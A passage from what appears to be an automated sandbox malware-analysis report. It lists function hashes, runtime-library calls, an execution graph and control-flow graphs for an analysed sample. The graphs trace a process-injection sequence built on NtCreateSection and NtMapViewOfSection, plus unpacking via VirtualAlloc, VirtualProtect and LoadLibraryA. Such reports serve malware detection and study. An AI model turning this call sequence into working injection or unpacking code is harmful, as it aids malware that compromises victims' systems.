                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3018F76A006048FDF21EF64C804BAE33F5FB86316F5945A5D90AD7281E774A9418F90
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0040BFCA
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1E7: __getptd_noexit.LIBCMT ref: 0040C1EA
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1E7: __amsg_exit.LIBCMT ref: 0040C1F7
                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0040BFE1
                                                                                                                                                                                                                                                                                                                  • __amsg_exit.LIBCMT ref: 0040BFEF
                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0040BFFF
                                                                                                                                                                                                                                                                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 0040C013
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208724906.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 938513278-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 772a8c221fbc5ba7f30b4d0931496a36d951b32cc004d0b36c4964055d9fc683
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2b6464d8b5c8a2656e09f50e19f18634982ee79381d3ed1b89a33488fd702650
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 772a8c221fbc5ba7f30b4d0931496a36d951b32cc004d0b36c4964055d9fc683
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5FF0C232900312DBD624BB668C02B5A32A0EF00719F10063FF405FB6D2CB7C5A40EE9E
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0040B849
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1E7: __getptd_noexit.LIBCMT ref: 0040C1EA
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1E7: __amsg_exit.LIBCMT ref: 0040C1F7
                                                                                                                                                                                                                                                                                                                  • __amsg_exit.LIBCMT ref: 0040B869
                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0040B879
                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208724906.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: __amsg_exit$__getptd__getptd_noexit__lock
                                                                                                                                                                                                                                                                                                                  • String ID: h3C
                                                                                                                                                                                                                                                                                                                  • API String ID: 3445076945-2721789584
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3fb7e8230df80c89109e43ec8bf2f062cb18c349c47bab0e287928457a382fcf
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 70d3d12c1b6c068ff77d7befbd2ccd44c8f71ac2e3557a1cf9fbce01ca94aa3c
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3fb7e8230df80c89109e43ec8bf2f062cb18c349c47bab0e287928457a382fcf
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4018E329006119BD711BF669445B5A7364FF04719F00813BE804B76E0CB3C9981CBDD
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0040C0FF
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041208A: __mtinitlocknum.LIBCMT ref: 004120A0
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041208A: __amsg_exit.LIBCMT ref: 004120AC
                                                                                                                                                                                                                                                                                                                  • __lock.LIBCMT ref: 0040C120
                                                                                                                                                                                                                                                                                                                  • ___addlocaleref.LIBCMT ref: 0040C13E
                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208724906.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: __lock$___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                                                                                                                                                                  • String ID: h3C
                                                                                                                                                                                                                                                                                                                  • API String ID: 2123130959-2721789584
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 106cbe1b396be76e6be7e0fd6ac139be0086d3df0ca435349922fd558e8e738c
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 57a25fc3f36aa6f0d6a16c05ea14bac2c92729e0062948df83733c441e9e9563
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 106cbe1b396be76e6be7e0fd6ac139be0086d3df0ca435349922fd558e8e738c
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EB01A571440700DFD320AF66C945749BBE0AF04315F108A1FE5D6667E1CBB8A644CF18
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208724906.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: __calloc_crt__init_pointers__mtterm
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 2478854527-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: f8310ed9e7c38dd61ed72ace8746fab632eeba00b57f5d3d50a830db5c339aa3
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 4ff714db56b393ef8047c28b7d72382b37e163d8e06f4682dbe3d961ea013a96
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f8310ed9e7c38dd61ed72ace8746fab632eeba00b57f5d3d50a830db5c339aa3
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD31A2B1904310EBD720AF75AD4A61A3FA5EB18760B14527BE550A22F0D7BD8C40DF5C
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 00410044
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1E7: __getptd_noexit.LIBCMT ref: 0040C1EA
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1E7: __amsg_exit.LIBCMT ref: 0040C1F7
                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 00410052
                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 00410060
                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 0041006B
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410138: __getptd.LIBCMT ref: 00410147
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410138: __getptd.LIBCMT ref: 00410155
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208724906.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 803148776-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: d40bfed1f1e99471f44873eb16416b8afd4de05ea498befb25c06c12aa8105ba
                                                                                                                                                                                                                                                                                                                  • Instruction ID: dc5b0a9465e1526700206186415ad67edb925928d9d008fc708d202e7da969bc
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d40bfed1f1e99471f44873eb16416b8afd4de05ea498befb25c06c12aa8105ba
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A11E771D00249DFDB00EFA5C845ADD7BB0BB04318F10856AE814AB292DB799A51DF54
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208724906.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 3016257755-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 37864c3f5be63a2b55f177d24d8bdce2b2d517da3df1fba7e4c81dbf3d20f22f
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67116D3200814EBBCF165E85CC41CEE3F32BB18355B598856FE2859121D63AC9B2FB99
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208724906.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: __calloc_crt
                                                                                                                                                                                                                                                                                                                  • String ID: p;C
                                                                                                                                                                                                                                                                                                                  • API String ID: 3494438863-2027376208
                                                                                                                                                                                                                                                                                                                  • Opcode ID: a82129be9e6a79856bff112ff14f05ab2bd77bcfbb1757ce3dc5d649b7ed77fb
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1dca527475a856a563208190b95443e1304a381d554784fdb136edfcfb4db005
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a82129be9e6a79856bff112ff14f05ab2bd77bcfbb1757ce3dc5d649b7ed77fb
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C11A3713042115BE7288E2FBC90B722295F794724B289A3BE516EB3D0E73CDC52828C
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208724906.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: CallFrame@12Setting__getptd
                                                                                                                                                                                                                                                                                                                  • String ID: j
                                                                                                                                                                                                                                                                                                                  • API String ID: 3454690891-2137352139
                                                                                                                                                                                                                                                                                                                  • Opcode ID: d6d97c7de16eb7e09c7d59a5672cf5c2b2a75714001a6a066c6dbfcb644386d6
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 172d1e221fa20930680d3a033bc4b89920a22c62889d339da349138c974a4ec9
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d6d97c7de16eb7e09c7d59a5672cf5c2b2a75714001a6a066c6dbfcb644386d6
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24118E31801255DBCB20DF19C0447ADB770BF00318F24817AE8597BAC3C3786999DBC5
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 00410147
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1E7: __getptd_noexit.LIBCMT ref: 0040C1EA
                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040C1E7: __amsg_exit.LIBCMT ref: 0040C1F7
                                                                                                                                                                                                                                                                                                                  • __getptd.LIBCMT ref: 00410155
                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2208724906.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_40b000_file.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                                                                                                  • API String ID: 803148776-1018135373
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0a9680110b453a9a50d3c2920676445ab074aa36b42b7325a6449f3b0d1553d6
                                                                                                                                                                                                                                                                                                                  • Instruction ID: 55b905d71dbe1a9469286b4ad80e262836567c96970bc9265711a4e73c55b92e
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a9680110b453a9a50d3c2920676445ab074aa36b42b7325a6449f3b0d1553d6
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9011E34400644EFDB34AF65C440BAE73B5AF10315F54452FD086A6A92CB7D89D1DE49
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                                                                                                  Execution Coverage:5.4%
                                                                                                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:67.6%
                                                                                                                                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                  Total number of Nodes:74
                                                                                                                                                                                                                                                                                                                  Total number of Limit Nodes:7
                                                                                                                                                                                                                                                                                                                  execution_graph 11001 42ed70 11002 42fae0 11001->11002 11005 42e6b0 11002->11005 11008 42e6d8 GlobalAlloc 11005->11008 11007 42eae7 11014 42e080 11007->11014 11008->11007 11010 42ebf4 11011 42ec24 GlobalFlags LocalSize 11010->11011 11012 42ec48 LoadLibraryA 11010->11012 11011->11010 11013 42ec63 11012->11013 11015 42e0b2 VirtualProtect 11014->11015 11015->11010 11017 402f03 11019 402f11 11017->11019 11018 402f9d 11019->11018 11021 401969 11019->11021 11022 401977 11021->11022 11023 4019ac Sleep 11022->11023 11024 4019c7 11023->11024 11026 4019d8 11024->11026 11027 401590 11024->11027 11026->11018 11028 4015a1 11027->11028 11029 401639 NtDuplicateObject 11028->11029 11038 401755 11028->11038 11030 401656 NtCreateSection 11029->11030 11029->11038 11031 4016d6 NtCreateSection 11030->11031 11032 40167c NtMapViewOfSection 11030->11032 11034 401702 11031->11034 11031->11038 11032->11031 11033 40169f NtMapViewOfSection 11032->11033 11033->11031 11035 4016bd 11033->11035 11036 40170c NtMapViewOfSection 11034->11036 11034->11038 11035->11031 11037 401733 NtMapViewOfSection 11036->11037 11036->11038 11037->11038 11038->11026 11039 7fd698 11040 7fd6a7 11039->11040 11043 7fde38 11040->11043 11044 7fde53 11043->11044 11045 7fde5c CreateToolhelp32Snapshot 11044->11045 11046 7fde78 Module32First 11044->11046 11045->11044 11045->11046 11047 7fde87 11046->11047 11049 7fd6b0 11046->11049 11050 7fdaf7 11047->11050 11051 7fdb22 11050->11051 11052 7fdb33 VirtualAlloc 11051->11052 11053 7fdb6b 11051->11053 11052->11053 11054 40f389 11055 40f3a1 11054->11055 11059 40f399 __invoke_watson 11054->11059 11060 40b124 11055->11060 11057 40f3c5 __wsetenvp 11058 40b124 __calloc_crt RtlAllocateHeap 11057->11058 11057->11059 11058->11057 11061 40b12d 11060->11061 11063 40b16a 11061->11063 11064 40d8ac 11061->11064 11063->11057 11065 40d8b8 __calloc_crt 11064->11065 11066 40d8c4 11065->11066 11067 40d8e6 RtlAllocateHeap 11065->11067 11066->11061 11067->11065 11067->11066 11068 4029f9 11069 4029ee 11068->11069 11070 402a0f LdrLoadDll 11069->11070 11071 402a1f 11070->11071 11072 230003c 11073 2300049 11072->11073 11085 2300e0f SetErrorMode SetErrorMode 11073->11085 11078 2300265 11079 23002ce VirtualProtect 11078->11079 11081 230030b 11079->11081 11080 2300439 VirtualFree 11084 23004be LoadLibraryA 11080->11084 11081->11080 11083 23008c7 11084->11083 11086 2300223 11085->11086 11087 2300d90 11086->11087 11088 2300dad 11087->11088 11089 2300dbb GetPEB 11088->11089 11090 2300238 VirtualAlloc 11088->11090 11089->11090 11090->11078 11091 40d88e HeapCreate

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 211 401590-4015c0 218 4015c6-4015e3 call 40120e 211->218 219 4015cd 211->219 223 4015e5 218->223 224 4015e8-4015ed 218->224 219->218 223->224 226 401913-40191b 224->226 227 4015f3-401604 224->227 226->224 230 401920-401966 call 40120e 226->230 231 401911 227->231 232 40160a-401633 227->232 231->230 232->231 239 401639-401650 NtDuplicateObject 232->239 239->231 241 401656-40167a NtCreateSection 239->241 244 4016d6-4016fc NtCreateSection 241->244 245 40167c-40169d NtMapViewOfSection 241->245 244->231 248 401702-401706 244->248 245->244 247 40169f-4016bb NtMapViewOfSection 245->247 247->244 250 4016bd-4016d3 247->250 248->231 251 40170c-40172d NtMapViewOfSection 248->251 250->244 251->231 253 401733-40174f NtMapViewOfSection 251->253 253->231 256 401755 call 40175a 253->256
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2577791765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 569c601533bfa5fc76acd0aceccd82dced2ec0ba9158162e35254d0d933d7b6e
                                                                                                                                                                                                                                                                                                                  • Instruction ID: d6964195f2ae178c179c3b7a32e304a619fe45f2cb2dcf097c8130f3d204b23e
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 569c601533bfa5fc76acd0aceccd82dced2ec0ba9158162e35254d0d933d7b6e
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64616FB0904205FFEB208F91CC58FAF7BB8EF81710F10416AFA12BA1E5D6749941DB65
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 258 40159b-4015c0 263 4015c6-4015e3 call 40120e 258->263 264 4015cd 258->264 268 4015e5 263->268 269 4015e8-4015ed 263->269 264->263 268->269 271 401913-40191b 269->271 272 4015f3-401604 269->272 271->269 275 401920-401966 call 40120e 271->275 276 401911 272->276 277 40160a-401633 272->277 276->275 277->276 284 401639-401650 NtDuplicateObject 277->284 284->276 286 401656-40167a NtCreateSection 284->286 289 4016d6-4016fc NtCreateSection 286->289 290 40167c-40169d NtMapViewOfSection 286->290 289->276 293 401702-401706 289->293 290->289 292 40169f-4016bb NtMapViewOfSection 290->292 292->289 295 4016bd-4016d3 292->295 293->276 296 40170c-40172d NtMapViewOfSection 293->296 295->289 296->276 298 401733-40174f NtMapViewOfSection 296->298 298->276 301 401755 call 40175a 298->301
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2577791765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: bae20a228bd41bc7813985564ad54ad8a6399e0ad18c72377fec9941621639a0
                                                                                                                                                                                                                                                                                                                  • Instruction ID: ff81ed2e81490e93a7bfe721f9c6a4d9304ec08e35c355afa89281eda0ffd623
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bae20a228bd41bc7813985564ad54ad8a6399e0ad18c72377fec9941621639a0
                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E5109B5900249BFEB208F91CC49FAB7BB8FF85710F144169FA11BA2E5D6749941CB24
                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                                  control_flow_graph 303 4015b0-4015c0 306 4015c6-4015e3 call 40120e 303->306 307 4015cd 303->307 311 4015e5 306->311 312 4015e8-4015ed 306->312 307->306 311->312 314 401913-40191b 312->314 315 4015f3-401604 312->315 314->312 318 401920-401966 call 40120e 314->318 319 401911 315->319 320 40160a-401633 315->320 319->318 320->319 327 401639-401650 NtDuplicateObject 320->327 327->319 329 401656-40167a NtCreateSection 327->329 332 4016d6-4016fc NtCreateSection 329->332 333 40167c-40169d NtMapViewOfSection 329->333 332->319 336 401702-401706 332->336 333->332 335 40169f-4016bb NtMapViewOfSection 333->335 335->332 338 4016bd-4016d3 335->338 336->319 339 40170c-40172d NtMapViewOfSection 336->339 338->332 339->319 341 401733-40174f NtMapViewOfSection 339->341 341->319 344 401755 call 40175a 341->344
                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                  • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
                                                                                                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
                                                                                                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A
                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.2577791765.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_400000_fjdvfwi.jbxd
                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                  • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                  • API String ID: 1546783058-0
                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6c4736dca5741fb18473fdef31891e556f9b158cac04651ef2a3a7cb79a50736
                                                                                                                                                                                                                                                                                                                  • Instruction ID: af686ae4933c2f6004de28669cc23aaadd0110c3f88d1b974755b8c34b4799b2
                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c4736dca5741fb18473fdef31891e556f9b158cac04651ef2a3a7cb79a50736
